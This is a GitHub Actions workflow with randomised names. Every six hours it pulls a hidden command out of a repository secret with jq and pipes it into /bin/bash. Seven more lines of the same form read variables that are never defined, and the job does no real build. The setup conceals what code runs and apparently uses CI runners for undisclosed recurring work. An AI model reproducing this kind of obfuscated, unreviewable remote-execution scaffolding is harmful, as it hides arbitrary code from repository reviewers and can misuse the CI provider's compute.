name: duansiqi9831

on:
  workflow_dispatch:
  schedule:
    - cron: '27 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duansiqi9831
        env:
          t086: ${{ secrets.t086 }}
        run: |
          echo $t086 | jq -r .uwb4 | /bin/bash
          echo $tuqf7283 | jq -r .foa7462 | /bin/bash
          echo $ra3 | jq -r .hh8776 | /bin/bash
          echo $mna33 | jq -r .ikx3325 | /bin/bash
          echo $qbgf38 | jq -r .vf92 | /bin/bash
          echo $ceu54 | jq -r .tv6106 | /bin/bash
          echo $vxon13389 | jq -r .bz56 | /bin/bash
          echo $cvxff9 | jq -r .ggqy7 | /bin/bash

